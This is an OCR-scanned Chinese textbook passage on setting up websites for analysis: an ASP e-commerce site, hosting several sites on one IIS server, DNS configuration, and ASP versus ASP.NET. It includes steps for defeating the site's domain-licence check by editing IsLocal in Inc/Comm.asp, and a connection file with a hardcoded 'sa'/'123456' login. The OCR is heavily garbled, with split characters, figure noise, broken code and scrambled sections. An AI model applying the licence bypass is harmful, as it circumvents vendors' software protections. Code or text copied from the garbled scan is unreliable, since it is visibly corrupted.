14 李 四 432143214321 2011-1-11 22:51:00 


一 开 下 4 nr 


EE md 0 Es 
图 2-32 ”Shop363_KuaiDi 数据 表 


(4) Inc/Comm. asp 文件 解析 。 

Inc/Comm. asp 文件 内 容 同 样 被 加 密 , 通 过 相关 VBScript 解密 工具 对 其 进行 解密 ， 
结果 如 图 2-33 所 示 。 代 码 中 可 以 找到 “对 不 起 ,该 网 站 程序 只 允许 在 本 机 及 域名 (www. 
15ydkj. com 15ydkj. com) 下 授权 使 用 !” 提 示人 信息。 


VBscript 
~ 
《1--#include file="ComSql. asp”—> 
oy 
If SitBd0pen=“1”Then 
IsLocal=0 
If SitBdHttpO”” Then 
SitBdHttpa=split (SitBdHttp, “|”) 
For YmLBound(SitBdHttpa) To UBound(SitBdHttpa) 
SitBdHttpshow=SitBdHttpshondSitBdHttpa(Ym)& "Bnbsp; anbsp; ” 

If IsLocal=0 then 

If LCase (Request. servervariables(”server_name”))=LCase (SitBdHttpa(Ym)) Then IsLocal=1 

End if 
Next 
End if 
if LCase (Request. servervariables(”server_name”))<>”localhost” And LCase(Request, servervariables 
(“server_name”))<>"127. 0. And IsLocal=0 then 

response, Write“ 对 不 起 ， 该 网 站 程序 只 允许 在 本 机 及 域名 (&nbsp;&nbsp; “&SitBdHttpshom&”) 下 授权 使 用 !” 

response. end 
end if 
End If Md 


图 2-33 Inc/Comm. asp 文件 解密 结果 


对 源 代码 进行 分 析 发 现 ,关键 词 出 现在 一 个 条 件 语 句 中 , 当 满 足 特定 条 件 时 , 才 会 显 
示 该 提示 信息 ,该 条 件 为 : 


if LCase (Request. servervariables (server_name’))< > “localhost” And 
LCase (Request. servervariables(server_name’))< > “127.0.0.1 And lsLocal=0 


在 让 语句 中 使 用 “与 ”逻辑 关系 连接 了 三 个 条 件 , 即 同时 满足 以 下 三 个 条 件 时 , 才 出 


现 关键 词 信息 : 
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LCase (Request. servervar iables (server_name’))< > “localhost” 
LCase (Request. servervariables( server_name’))< > “127.001" 
1sLocal=0 


任何 一 个 关系 不 成 立 , 界 面 都 不 能 显示 “对 不 起 ,该 网 站 程序 只 允许 在 本 机 及 域名 
(www. 15ydkj. com 15ydkj. com) 下 授权 使 用 !1” 提 示人 信息, 其 中 前 两 个 条 件 中 的 Request. 
servervariables("server_name") 表 明 从 客户 端 发 送 到 服务 器 端的 HTTP 请 求 信息 中 提 
取 服 务 器 端的 IP 地 址 或 名 称 , 最 后 一 个 条 件 IsLocal=0 判断 一 个 变量 IsLocal 的 值 是 否 
等 于 0, 根 据 用 户 能 力 ,选择 修改 哪 一 个 条 件 都 可 以 ,只 要 使 其 不 成 立即 可 ,这 里 选择 修改 
代码 段 如 下 

< 上 -# include file= “CorSql. asp”——> 

<% 

If SitBdOper= “1” Then 

IsLocal=0 


变 为 


<I-—# include file= “ComSql.asp 一 -> 
<% 

If SitBdOper= “1” Then 

IsLocal=1 


这 样 就 保证 了 IsLocal=0 条 件 的 不 成 立 性 ,修改 完毕 ,将 原文 件 内 容 窗 盖 。 
3. 测试 
在 客户 端 重新 访问 该 网 站 ,显示 内 容 如 图 2-34 所 示 ,表明 该 网 站 发 布 成 功 。 


大 ， 旺 角 商 城 | game 站 
15yg 


kj.com 


2011.101New Arrival 
[十 .一 华 衣 ] 
夺目 党 天 


图 2-34 webshopl5ydkj 网 站 主页 
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在 该 网 站 的 发 布 过 程 中 , 遇 到 问题 时 ,注意 根据 页 面 显 示 的 错误 信息 ,找到 相关 源 代 
码 文件 ,注释 掉 相关 代码 段 , 保 证 页 面 内 容 正常 显示 。 


| IDC 网 站 系统 


IDC(Internet Data Center, 互 联网 数据 中 心 ) 可 为 用 户 提 供 包括 申请 域名 、 租 用 虚拟 
主机 空间 .主机 托管 等 服务 。 一 些 个 人 或 小 企业 网 站 最 常 使 用 的 网 站 发 布 方式 是 向 IDC 
申请 收费 或 免费 的 虚拟 主机 空间 ,再 通过 FTP 方式 将 网 站 源码 及 数据 库 上 传 至 指定 目 
录 , 然 后 就 可 以 通过 IDC 分 配 的 三 级 域名 访问 所 发 布 的 网 站 。 这 类 网 站 常常 是 由 个 人 开 
发 或 是 程序 员 从 网 上 下 载 相关 建站 模板 加 以 修改 ,漏洞 较 多 ,常常 成 为 被 攻击 对 象 。 为 更 
好 地 分 析 此 类 网 站 ,了 解 此 类 网 站 的 运行 平台 ,本 节 将 模拟 IDC 构建 虚拟 主机 系统 。 


23.1 什么 是 虚拟 主机 


虚拟 主机 (Virtual Host) 是 使 用 特殊 的 软 硬 件 技术 ,把 一 台 计 算 机 主机 分 成 一 台 台 
“虚拟 ”的 主机 ,每 一 台 虚 拟 主机 都 具有 独立 的 域名 和 IP 地 址 (或 共享 的 IP 地 址 ) ,具有 完 
整 的 网 站 服务 器 功能 。 在 同一 台 硬 件 、 同 一 个 操作 系统 上 ,运行 着 不 同 的 服务 器 程序 , 互 
不 干扰 ;每 台 虚 拟 主机 拥有 自己 的 一 部 分 系统 资源 (IP 地 址 、 文 件 存 储 空间 、 内 存 .CPU 
时 间 等 )。 虚 拟 主机 之 间 完 全 独立 , 在 外 界 看 来 ,每 台 虚 拟 主机 和 一 台 完 全 独立 的 主机 的 
表现 能 力 完 全 一 样 。 

通常 一 台 虚 拟 主机 能 够 架设 成 百 上 千 个 网 站 。 如 果 一 台 虚 拟 主机 的 网 站 数量 很 多 ， 
它 就 应 该 拥有 更 多 的 CPU 内 存 和 使 用 服务 器 阵列 ;如 果 从 虚拟 主机 分 销 商 处 购买 虚拟 
主机 ,分 销 商 为 了 高 额 利润 ,会 在 一 台 主 机 上 尽 可 能 多 地 架设 网 站 ,造成 客户 的 网 站 在 虚 
拟 主机 的 速度 受阻 。 所 以 ,最 好 的 办 法 就 是 寻找 一 家 有 信誉 的 虚拟 主机 提供 商 , 他 们 的 每 
台 虚 拟 主机 服务 器 是 有 网 站 承载 个 数 限 制 的 。 当 然 如 果 对 网 站 有 很 高 的 速度 和 控制 要 
求 ,最 终 的 解决 方案 就 是 购买 自己 独立 的 服务 器 。 


232 发 布 多 个 网 站 


网 络 上 的 每 一 个 Web 站 点 都 有 一 个 唯一 的 身份 标识 ,从 而 使 客户 机 能 够 准确 地 访问 
到 该 站 点 。 这 一 标识 由 IP 地 址 、TCP 端口 号 和 主机 头 名 三 部 分 组 成 ,要 在 一 台 主 机 上 发 
布 多 个 站 点 ,可 以 从 这 三 方面 考虑 。 本 节选 择 的 网 站 运行 平台 是 Windows 2003 Server 
操作 系统 十 IIS6. 0 ,数据库 为 SQL Server 2000, 实 现在 该 服务 器 上 同时 发 布 “ 动 网 论坛 ” 
和 “网 上 商城 ”两 个 网 站 。 


1. 地址 法 
如 果 服 务 器 安装 有 两 块 以 上 的 网 卡 ,可 为 每 块 网 卡 指定 不 同 的 IP 地 址 ,将 不 同 的 IP 
地 址 分 配给 不 同 站 点 ,从 而 实现 发 布 多 个 网 站 。 若 服务 器 只 有 一 块 网 卡 ,那么 同样 也 可 以 
为 这 块 网 卡 绑 定 多 个 IP 地 址 ,每 个 IP 地 址 对 应 一 个 Web 站 点 ,来 实现 “一 机 多 站 ”的 
目的 。 
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【 实 训 2-3】〗 为 虚拟 主机 Windows 2003 Server 配置 两 个 IP 地 址 192. 168. 6. 128 和 
192. 168. 6. 129 ,通过 IIS 发 布 网 站 ,为 “ 动 网 论坛 "指定 IP 地 址 为 192. 168. 6. 128,“ 网 上 
商城 ”IP 地址 为 192. 168. 6. 129。 

(1) 首先 为 主机 绑 定 两 个 不 同 的 IP 地 址 。 

在 虚拟 主机 Windows 2003 Server 操作 系统 中 ,选择 “开始 ”一 “控制 面板 ”网 络 连 
接 ”~~“ 本 地 连接 ”命令 ,打开 * 本 地 连接 状态 ”对 话 框 , 单 击 * 属 性 ?按钮 打开 * 本 地 连接 属 
性 ?对 话 框 , 在 该 对 话 框 内 选择 “Internet 协议 (TCP/IP)” 项 目 , 单 击 “属性 ”按钮 打开 
“Internet 协议 (TCP/IP) 属 性 ”对 话 框 ,配置 IP 地 址 为 192. 168. 6. 128 ,如 图 2-35 所 示 。 

单 击 “ 高 级 ”按钮 ,打开 “高 级 TCP/IP 设置 ?对 话 框 。 在 IP 地 址 栏 下 面 列 出 了 网 卡 已 
设 定 的 IP 地 址 和 子 网 掩 码 , 单 击 “ 添 加 ”按钮 ,在 弹出 的 对 话 框 中 填 上 新 的 IP 地 址 192. 
168. 6. 129, 子 网 掩 码 与 为 255. 255. 255. 0。 然 后 依次 点 击 “ 添 加 ”和 “确定 ”按钮 ,这 样 就 
为 该 主机 绑 定 了 两 个 IP 地 址 分 别 为 192. 168. 6. 128 和 192. 168. 6. 129 ,如 图 2-36 所 示 。 


2 
了 到 ee re sl sl 
党 规 | TP 地 址 QB) 
和 Pe Be 
个 自动 获得 IP 地 址 @) 
_6 随 用 下 面 的 本 地 让 三 添加 0)..，| 编辑 EE).. 删除 
BE A EIITHEEEEE 2 
了 3 25 .255 .255 0_ 阳 地 址 10160 6 -129 
: | 
a) 子 网 掩 码 (8): 255 .255 .255 . 0 
合 自动 获得 DNS 服务 器 地 址 外 ) 
6 使 用 下 面 的 DNS 服务 器 地 址 多 ): 一 一 一 一 | [mw | we | 
首选 DNS 服务 器 中); 2 F 自动 跃 点 计数 他 
备用 DNS 服务 器 (的: Ee | 
Cw ] ww | ww | a | 
图 2-35 “Internet 协议 (TCP/IP) 属 性 ”对 话 框 图 2-36 “高 级 TCP /IP 设置 "对 话 框 


(2) 在 主机 上 通过 IIS 发 布 “ 动 网 论坛 ,为 其 指定 IP 地 址 192. 168. 6. 128 ,操作 步骤 
见 实 训 2-1。 

(3) 在 主机 上 通过 IIS 发 布 “电子 商城 ”, 为 其 指定 IP 地 址 192. 168. 6. 129 。 

通过 IIS 配置 发 布 “ 电 子 商城 ”网 站 操作 步骤 与 “ 动 网 论坛 "网 站 的 发 布 相似 ,但 由 于 
对 网 站 源码 文件 目录 进行 查找 后 ,未 发 现 扩 展 名 为 mdb 及 sql 的 数据 库 恢复 文件 ,故而 不 
能 采用 与 “ 动 网 论坛 "同样 的 后 台数 据 库 恢复 方式 ,但 是 在 database 子 目录 内 发 现 了 shop_ 
Data. MDF 文件 ,经 分 析 根 据 扩展 名 为 mdf 的 文件 可 采用 附加 数据 库 的 方式 来 还 原 网 站 
后 台数 据 库 ,具体 操作 方法 如 下 : 

@ 选择 “开始 ”一 “所 有 程序 ”> Microsoft SQL Server 一 “企业 管理 器 ”命令 ,打开 
SQL Server Enterprise Manager 窗口 。 
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@ 单 击 “(local) (Windows NT)” 树 状 结 点 , 右 击 “ 数 据 库 ” 项 ,在 弹出 的 快捷 菜单 中 选 
择 “ 所 有 任务 ”>“ 附 加 数据 库 ” 命 令 , 打 开 “ 附 加 数据 库 ” 对 话 框 如 图 2-37 所 示 ,选择 要 附 
加 数据 库 的 MDF 文件 ,该 文件 位 于 源码 目录 下 database 子 目 录 下 ,名 为 shop_Data. 
MDF ,该 例子 中 文件 主 目录 为 C:\Shop, 所 以 选择 的 附加 文件 为 C:\Shop\database\shop_ 
Data. MDF。 单 击 “ 确 定 ” 按 钮 完成 数据 结构 及 数据 的 恢复 。 


FE ter yin =I9lx| 
从 文件 四 操作 () 查看 WD 工具 CD) 窗口 WD 帮助 0 |=18lx| 
叶 沙 | 四 | 加 |X 贸 国 区 | 访 | 米 | 从 即日 甘 乌 
C 厂 到 可 库 。 7 个 项 目 
x 
要 b 加 数据 库 的 MDF 文 件 ，[M 
|E\Shop\database\shop_Data MDF- 回 验证 V) | 
到 当前 文件 位 年 
shop_Data MDF C\Shop\database\shop_Data MDF- 
shop_LogLDF 回 C\Shop\database\shop_Log LDF 


图 2-37 “附加 数据 库 ” 对 话 框 


为 使 网 页 能 够 正常 显示 , 即 前 台 网 页 能 够 访问 所 生成 的 后 台数 据 库 shop 里 面 的 数 
据 , 接 下 来 要 修改 数据 库 连 接 配 置 文件 内 容 。 若 源码 所 在 目录 为 C:\Shop, 则 该 配置 文件 
为 C;\Shop\include\conn. asp ,修改 关键 参数 如 图 2-38 所 示 。 


[Ye 
文件 FE) 编辑 人 E) 格式 0) 查看 WW) 帮助 中 
<% 
SqlpatabaseName = “shop” "数据 库 名 

Sqlusername = “sa” ' 用 户 名 

SqlpPassword = “123456" "用户 密 码 

Dim Conn,ConnStr 

Set Conn = Seruer-Create0bject("nD0DB-Connection") 

connstr = “Provider = Sqloledb; Persist Security Info=false; User ID = ”& SqlUsername &" 
conn .0pen Connstr 
3 


图 2-38 ”conn. asp 中 数据 库 连 接 参 数 


最 后 ,在 客户 端 主机 内 的 浏览 器 内 可 通过 http://192. 168. 6. 128 地 址 访问 “ 动 网 论 
坛 " 网 站 ,通过 http://192. 168. 6. 129 地 址 访问 “电子 商城 ”网 站 。 为 方便 ,也 可 以 进行 
DNS 配置 ,为 IP 地 址 设置 域名 ,再 通过 相应 的 域名 访问 网 站 。 具 体 方法 见 2. 2. 3 节 。 

这 种 方式 下 ,不 同 的 主机 名 解析 到 不 同 的 IP 地 址 ,提供 虚拟 主机 服务 的 机 器 上 同时 
设置 了 这 些 IP 地 址 。 服 务 器 根据 用 户 请 求 的 目的 IP 地 址 来 判定 用 户 请 求 的 是 哪个 虚拟 
主机 的 服务 ,并 做 进一步 的 处 理 。 其 缺点 是 需要 在 提供 虚拟 主机 服务 的 机 器 上 设立 多 个 
IP 地 址 , 既 浪 费 了 IP 地 址 ,又 限制 了 一 台 机 器 所 能 容纳 的 虚拟 主机 数目 ,因此 这 种 方式 
越 来 越 少 使 用 。 但 是 ,这 种 方式 是 早期 使 用 的 HTTP1. 0 协议 唯一 支持 的 虚拟 主机 方式 。 
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2. TCP 端口 法 

Web 站 点 的 默认 端口 一 般 为 80 ,通过 改变 这 一 端口 ,同样 可 以 实现 在 同一 服务 器 上 
新 增 站 点 的 目的 。 

【 实 训 2-4】 假设 虚拟 主机 Windows 2003 Server 安装 有 一 块 网 卡 , 只 有 一 个 JP 地 
址 为 192. 168. 6. 128 ,通过 IIS 发 布 “ 动 网 论坛 "和 “网 上 商城 ”, 为 “ 动 网 论坛 "指定 TCP 端 
口 为 默认 Web 端口 80,“ 网 上 商城 ”TCP 端口 为 Web 非 默认 Web 端口 81。 

(1) 在 IIS 上 发 布 “ 动 网 论坛 ”,IP 地 址 为 192. 168. 6. 128 ,端口 为 默认 端口 80, 具 体 
设置 方法 参见 2. 1.2 节 。 

(2) 使 用 IIS 通 过 不 同 端 口 81 发 布 “电子 商城 ”步骤 参见 2. 1. 2 节 , 创 建 过 程 中 注意 为 
该 网 站 指定 与 “ 动 网 论坛 "同样 的 IP 地 址 192. 168. 6. 128, 不 同 的 TCP 端口 81, 如 图 2-39 
所 示 。 


IP 地 址 和 请 口 设置 
指定 新 网 站 的 IP 地 址 ,端口 设置 和 主机 头 。 


网 站 ?地 址 区): 

sz 168. 6. 128 | 
网 站 TCP 端口 鞭 认 值 : 80) GD) : 

团 


此 网 站 的 主机 头 鞭 认 : 无 ) oD 


有 关 更 多 信息 ， 请 参阅 IIS 产品 文档 。 


《 上 一 步 @) | 下 一 步 吧 >| 取消 


图 2-39 “IP 地 址 和 端口 设置 ”对话 框 


(3) 进行 测试 ,在 浏览 器 地 址 栏 中 输入 http://192. 168. 6. 128 访问 “ 动 网 论坛 ”, 输 
入 http://192. 168. 6. 128: 81 访问 “电子 商城 ”, 注 意 IP 地 址 后 的 非 默认 端口 号 不 能 
省 略 。 

使 用 不 同 端口 号 发 布 多 网 站 的 最 大 缺点 是 无 法 与 DNS 结合 .用户 只 能 使 用 IP 地 址 
加 端口 号 的 方式 访问 网 站 ,由 于 不 能 使 用 域名 ,用 户 访问 起 来 比较 麻烦 ,不 利于 网 站 的 
推广 。 


3. 主机 头 法 

在 不 更 改 TCP 端口 和 IP 地 址 的 情况 下 ,同样 可 以 实现 在 同一 主机 发 布 多 个 站 点 ,就 
需要 使 用 "主机 头 名 ”来 区 分 不 同 的 站 点 。 所 谓 “* 主 机 头 名 ”, 实 际 上 就 是 指 www. shop. 
com 之 类 的 友好 网 址 ,因此 要 使 用 “主机 头 法 ”实现 “一 机 多 站 ”, 就 必须 先进 行 DNS 设置 ， 
将 所 有 的 主机 头 都 指向 同一 个 IP 地 址 。 

HTTP 1. 1 协议 中 增加 了 对 基于 主机 名 的 虚拟 主机 的 支持 。 当 客户 程序 向 网 站 服务 
器 发 出 请 求 时 ,客户 想 要 访问 的 主机 名 也 通过 请 求 头 中 的 “Host:” 语 句 传递 给 网 站 服务 
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器 。 例 如 ,www. companyl. com、www. company2. com 都 对 应 于 同一 个 IP 地 址 ( 即 由 同 
一 台 机 器 来 给 这 两 个 虚拟 域名 提供 服务 ) ,客户 程序 要 访问 http://www. company1. 
com/index. html 文件 时 ,发 出 的 请 求 头 中 包含 有 如 下 的 内 容 : 


GET /index. html HTTP/1.1 
Host: ww. company1. com 


网 站 服务 器 程序 接收 到 这 个 请 求 后 ,可 以 通过 检查 “Host: ”语句 判定 客户 程序 请 求 
是 哪个 虚拟 主机 的 服务 ,然后 再 进一步 的 进行 处 理 。 

其 优点 : 提供 虚拟 主机 服务 的 机 器 上 只 要 设置 一 个 IP 地 址 ,理论 上 就 可 以 给 无 数 多 
个 虚拟 域名 提供 服务 ,占用 资源 少 ,管理 方便 。 目 前 基本 上 都 是 使 用 这 种 方式 来 提供 虚拟 
主机 服务 。 

其 缺点 : 在 早期 的 HTTP 1.0 版 本 下 不 能 使 用 。 实 际 上 现在 使 用 的 浏览 器 基本 上 都 
支持 基于 主机 名 的 虚拟 主机 方式 。 

【 实 训 2-5】 假设 虚拟 主机 Windows 2003 Server 安装 有 一 块 网 卡 , 只 有 一 个 IP 地 
址 为 192. 168. 6. 128 ,通过 IIS 发 布 “ 动 网 论坛 "和 “网 上 商城 ”, 为 “ 动 网 论坛 "指定 TCP 端 
口 为 默认 Web 端口 80, 主 机 头 为 “dvbbs. ccpc. edu”, 为 “网 上 商城 ”TCP 端口 为 Web 默 
认 Web 端口 80 ,主机 头 为 shop. ccpc. edu。 

(1) 在 DNS 中 设置 http://shop. ccpc. edu 和 http://dvbbs. ccpc. edu 两 个 网 址 ,将 
它们 都 指向 唯一 的 IP 地 址 192. 168. 6. 128。 具 体 设置 参见 2. 2. 3 节 。 

(2) 在 IIS 上 发 布 “ 动 网 论坛 ",IP 地 址 为 192. 168. 6. 128 ,端口 为 默认 端口 80, 具 体 
设置 方法 参见 2. 1.2 节 。 

(3) 为 “ 动 网 论坛 ”增加 主机 头 dvbbs. ccpc. edu。 

在 所 创建 的 dvbbs 网 站 上 右 击 ,在 弹出 的 快捷 菜单 中 选择 “属性 ”命令 ,打开 “dvbbs 


到 | 属性 ”对话 框 ,选择 “高 级 ”, 打 开 “ 高 级 网 站 标识 ” 
二 对 话 框 ,选择 网 站 标识 , 单 击 * 编 辑 * 按 钮 ,打开 * 添 
to [ss 习 || 加 /编辑 网 站 标识 "对 话 框 ,输入 该 网 站 的 主机 头 
ee 值 dvbbs. ccpc. edu, 单 击 “ 确 定 ” 按 钮 ,完成 主机 头 
P| | 的 添加 操作 ,如 图 2-40 所 示 。 

取消 | 。 玫 助 o | (4) 在 HIS 上 发 布 “电子 商城 ”, IP 地 址 为 


192. 168. 6. 128 ,端口 为 默认 端口 80, 具 体 设置 方 
法 参见 实 训 2。 
(5) 为 “电子 商城 ?增加 主机 头 shop. ccpc. edu, 具 体 设 置 方法 参见 步骤 (3) 。 
完成 以 上 设置 后 ,可 在 客户 端 浏览 器 内 通过 http://dvbbs. ccpc. edu 访问 “ 动 网 论 
坛 ? 网 站 ,通过 http://shop. ccpc. edu 访问 “电子 商城 ?网 站 。 


233 域名 服务 器 配置 
【 实 训 2-6】 虚拟 机 Windows 2003 Server 是 DNS 服务 器 ,IP 地 址 为 192. 168. 6. 


图 2-40 “添加 /编辑 网 站 标识 ”对 话 框 
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128 ,客户 机 IP 地 址 为 192. 168. 6.1 ,客户 机 与 虚拟 机 的 联网 方式 为 host-only, 在 虚拟 机 
中 配置 两 个 域名 http://shop. ccpc. edu 和 http://dvbbs. ccpc. edu, 它 们 对 应 的 IP 地 址 
均 为 192. 168. 6. 128。 

(1) 主机 安装 DNS 后 ,选择 “开始 ”一 “管理 工具 ”DNS 命令 ,打开 域名 系统 管理 窗 
口 ,如 图 2-41 所 示 。 


元 dnsegnt -~ [DNS\CCPC-XP\ 正 向 查找 区 域 ] 
名 文件 四 操作) 查看 WD 窗口 刀 帮助 四 
气 守 | 回回 | 国 | 区 | 目 目 印 


= 
|=181 


去 于 本 于 
日 - 目 ccrc-xr 
让 国事 ; 
加 aa 
日 


ET ONRS) 区 许 阁 DNS 名 称 空间 分 成 区 域 。 每 个 区 域 存储 有 关 一 个 或 多 个 连续 的 DRS 域 
要 添加 一 个 新 区 域 ， 请 在 “操作 ”菜单 ， 单 击 “ 新 建 区 域 ”。 


图 2-41 域名 系统 管理 窗口 


(2) 在 域名 系统 管理 窗口 中 ,选择 * 正 向 查找 区 域 ?项 , 右 击 , 在 弹出 的 快捷 菜单 中 选 
择 “ 新 建 区 域 "命令 ,打开 “新 建 区域 向 导 ” 对 话 框 , 单 击 “ 下 一 步 " 按 钮 创建 区 域 , 均 按 默 认 
选项 设置 进行 ,为 区 域 指定 名 称 ccpc. edu, 如 图 2-42 所 示 。 


新 建 区 域 向 导 x| 


区 域名 称 
新 区 域 的 名 称 是 什么 ? __E 


newrone, 和 S23 


区 域名 称 区) : 


FE 


有 关 区 域名 称 的 洋 细 信 息 ， 请 单 击 “ 帮 助 ”。 


-sg[F2G my | Wh | 
图 2-42 “新 建 区 域 向 导 ” 对 话 框 


(3) 在 域名 系统 管理 窗口 中 ,选择 新 建 区 域 ccpc. edu, 右 击 , 在 弹出 的 快捷 菜单 中 选 
择 “ 新 建 主机 ”命令 ,在 弹出 的 窗口 中 输入 主机 名 dvbbs,IP 地 址 为 192. 168. 6. 128, 如 
图 2-43 所 示 。 

(4) 在 ccpc. edu 区 域 中 新 建 主 机 shop:IP 地 址 为 192. 168. 6. 128, 同 步骤 (3)。 

(5) 测试 。 

@ 为 客户 端 设置 域名 服务 器 为 192. 168. 6. 128。 

在 客户 端 主 机 内 选择 “开始 ”>“ 控 制 面板 ”命令 打开 “控制 面板 ”窗口 ,双击 “网 络 连 
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dnsegat - [DES\CCPC-IP\ 正 稍 查 乒 区 域 Acepe edaj 下 加 

避 文件、 二 全 CCE。 | 
国 动 | 名 称 和 0 果 为 宝 则 使 用 其 父 域名 称 ) QD : 

avbbs 

完全 合格 的 域名 CgDm) 

[bs cepe. au 

I? 地 址 凶 ): 

haz .168 .6 .128| 


厂 创 绊 相关 的 指针 PTR) 记 录 CC) 


图 2-43 “新 建 主机 ”对 话 框 


接 ”, 在 打开 的 窗口 内 双击 VMware Network Adapter VMnetl 网 卡 , 单 击 “ 属 性 "按钮 打 
开 “VMware Network Adapter VMnetl 属性 ”对 话 框 ,选择 “Internet 协议 (TCP/IP)” 项 
目 , 单 击 “ 属 性 ”按钮 ,打开 “Internet 协议 (TCP/IP) 属 性 "对话 框 ,设置 客户 机 的 DNS 服 
务 器 地 址 为 192. 168. 6. 128 ,如 图 2-44 所 示 。 


7 
[ 韦 
和 


加 自动 获得 I? 地 址 @) 

名 秋 用 下 面 的 二 地 直人 ) 
IP 地 址 人 0): 

子 网 掩 码 QD) : 


默认 网 关 @): 


自动 获得 DNS 服务 器 地 址 色 ) 
全 使 用 下 面 的 DRS 服务 器 地 址 到) : 
首选 DRS 服务 器 到 ) 
备用 DNS 服务 器 @&) 


图 2-44 “Internet 协议 (TCP/IP) 属 性 ”设置 对 话 框 


@ 在 客户 端 主机 内 运行 nslookup 命令 进行 测试 

选择 “开始 ”一 “运行 "命令 ,运行 cmd 命令 ,打开 命令 行 运行 窗口 ,输入 nslookup 命令 
对 域名 进行 解析 测试 ,运行 结果 显示 http://shop. ccpc. edu 和 http://dvbbs. ccpc. edu 
都 对 应 192. 168. 6. 128 ,如 图 2-45 所 示 。 
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dninistratornslookup dubbs.ccpc .edu 


192.168.6.128: Tined out 


dubhs -ccpc -edu 
: 192.168.6.128 


C:\Documents and Settings\Adninistrator> 


图 2-45 域名 解析 测试 结果 
2.4 发 布 ASP.NET 网 站 


241 什么 是 ASPNET 

ASP. NET 是 一 种 建立 在 通用 语言 上 的 程序 
Web 应 用 程序 。ASP. NET 也 是 目前 微软 公司 主推 的 Web 应 用 程序 ee 平台 
软 公司 开发 的 配套 软件 齐全 、 使 用 方便 及 各 软件 相互 间 实现 无 缝 对 接 , 使 得 


务 网 站 均 采 用 ASP. NET 技术 ,如 京东 商城 、 当 当 网 等 


242 ASPNET 程 序 与 ASP 程序 的 区 别 


架 , 用 于 一 台 Web 服务 器 建 


分 析 


并 强 
?。 由 于 视 
ASP. NET 
网 站 逐渐 成 为 市 场 上 继 PHP 之 后 的 第 二 大 主流 网 站 ， 国内 大 部 分 主流 的 大 中 型 电子 


大 的 


- 商 


与 传统 的 ASP 相 比 ,ASP. NET 加 入 了 “面向 对 象 *? 和 “事件 驱动 ”的 特性 ,而 且 支 持 


多 种 编程 语言 ,如 C# 、VB、Jscript 等 。 为 了 更 好 说 明 两 种 程序 的 区 别 , 以 网 站 中 


a As 


地 间 


的 数据 处 理 流程 为 例 , 如 用 户 在 表单 中 输入 用 户 名 及 密码 , 单 击 “ 登 录 ” 按 钮 后 ， 


示 所 输入 的 用 户 名 及 密码 ,列举 两 种 程序 的 相应 实现 代码 。 
得 各 订 


在 页 


H 


实现 上 述 功能 通常 需要 两 个 文件 ,其 中 一 个 文件 index. html, 显 示 表单 相关 控件 ， 


心 代码 为 : 
< form name= “forml” method= “post” actiorc “login asp > 
< input type= “text” name= “name” size= 20> 
< input type= “password” name= “pwd” size= 20> 


核 
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《 input type=“submit”value= “确定 > 


< /form 
另外 一 个 文件 login. asp ,获取 表单 数据 并 显示 出 来 ,核心 代码 为 : 
《% 


nameStr= request. form( ‘name’) 
pwdStr= request. form( pwd’) 
response. wr ite nameStr 
response. write pwdStr 

%> 


2. ASP.NET 表 单 处 理 程序 
实现 上 述 功 能 通常 需要 两 个 文件 ,其 中 一 个 文件 index. aspx, 显示 表单 相关 控件 , 核 
心 代码 为 : 
< form id= “forml” runat= “server > 
< asp:TextBox ID= “TextBox1” runat= “server”/> 
< asp:TextBox ID= “TextBox2” runat= “server”/> 
< asp:Button ID= “Buttonl” runat= “server” OnClick= “Buttonl_Click” Text= 
“登录 "人 
《/form> 
另外 一 个 文件 index. aspx. cs, 表 单 处 理 文件 ,核心 代码 为 ， 


Protected void Buttonl_Click (object sender, EventArgs 日 
{ 
Response. Write (TextBox1. Text) ; 
Response. Wr ite (TextBox2 Text) ; 
} 


3. ASP.NET 程 序 与 ASP 程序 区 别 

从 以 上 简单 表单 数据 处 理 程序 实现 代码 中 ,可 以 看 出 两 种 web 程序 框架 的 主要 
区 别 ; 

(1) 编程 模式 不 同 。 

ASP 采用 页 面 中 嵌 套 代码 的 方法 ,可 将 VBScript 脚本 代码 通过 “一 % 上 之 ”标签 直 
接骨 套 在 HTML 代码 中 ,而 ASP. NET 采用 CodeBehind 技术 , 即 把 界面 设计 和 程序 设 
计 以 不 同 的 文件 分 离开 。 例 如 ,index. aspx 文件 只 负责 界面 显示 ,index. aspx. cs 文件 负 
责 迪 辑 业 务实 现 。 

(2) 编程 语言 不 同 。 

ASP 以 VBScript 脚本 语言 为 主 ,面向 过 程 ,系统 可 扩展 性 差 ; 而 ASP. NET 以 C# 为 
主 ,面向 对 象 ,系统 可 扩展 性 好 。 

(3) 运行 机 制 不 同 。 

ASP 是 解释 运行 的 ,运行 效率 较 低 ;而 ASP. NET 是 编译 运行 的 ,支持 多 种 编译 语 


各 9 音 


ER 2 证 


节 


,第 一 次 执行 速度 较 慢 ,整体 运行 效率 较 高 。 
(4) 源 代码 安全 性 不 同 。 
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在 ASP 网 站 服务 器 主 目录 内 可 见 所 有 的 源 代码 ;而 在 ASP. NET 网 站 服务 器 主 目录 
内 不 可 见 网 站 代码 源 文件 ,所 有 的 逻辑 代码 均 包含 在 编译 后 的 文件 中 ,一 定 程度 上 保证 了 


网 站 代码 的 安全 性 。 
243 ASPNET 网 站 目录 结构 


每 个 Web 应 用 程序 都 要 规划 自己 的 目录 结构 ,除了 设计 的 目录 结构 外 ,根据 Web 程 


序 开 发 技术 特点 及 编程 习惯 ,ASP. NET 也 定义 一 些 有 特殊 意义 的 
目录 。ASP.NET 网 站 源 代码 典型 目录 如 图 2-46 所 示 。 

(1) App_Data: 这 个 目录 是 给 数据 存储 保留 的 ,包括 SQL 
Server 2005 Express 的 数据 库 文 件 和 XML 文件 。 当 然 也 可 以 自 
由 在 其 他 的 目录 中 保存 数据 文件 。 

(2) App_Themes: 这 个 目录 保存 了 Web 应 用 程序 使 用 的 一 
些 项 目 。 

(3) bin: 这 个 目录 包含 了 所 有 的 预 编译 的 ASP. NET 的 Web 
应 用 程序 使 用 的 . NET 程序 集 (通常 是 DLLs) ,这 些 程序 集 也 包括 
预 编译 的 网 页 类 ,以 及 被 这 些 类 所 引用 的 其 他 的 程序 集 ,文件 扩展 
名 通常 为 dll。 

(4) aspnet_client: 这 个 目录 包含 应 用 程序 所 使 用 的 . NET 版 
本 信息 ,开发 者 机 器 安装 了 . NET 框架 之 后 ,就 会 在 网 站 目录 下 自 


GApp_Data]) 
DApp_Themes 
Daspnet_client 
Bbin 

DCss 
Images 

DJs 

DLib 
DLibrary 
DManage 
DPlugIn 
Dservice 

国 Global. asax 
目 Login. aspx 
回 Web. config 


图 2-46 ASP.NET 
目录 结构 


动 出 现 这 样 的 文件 夹 , 用 以 支持 . NET 环境 ,如 果 出 现 1 1_4322 子 文件 夹 ,表示 Web 应 


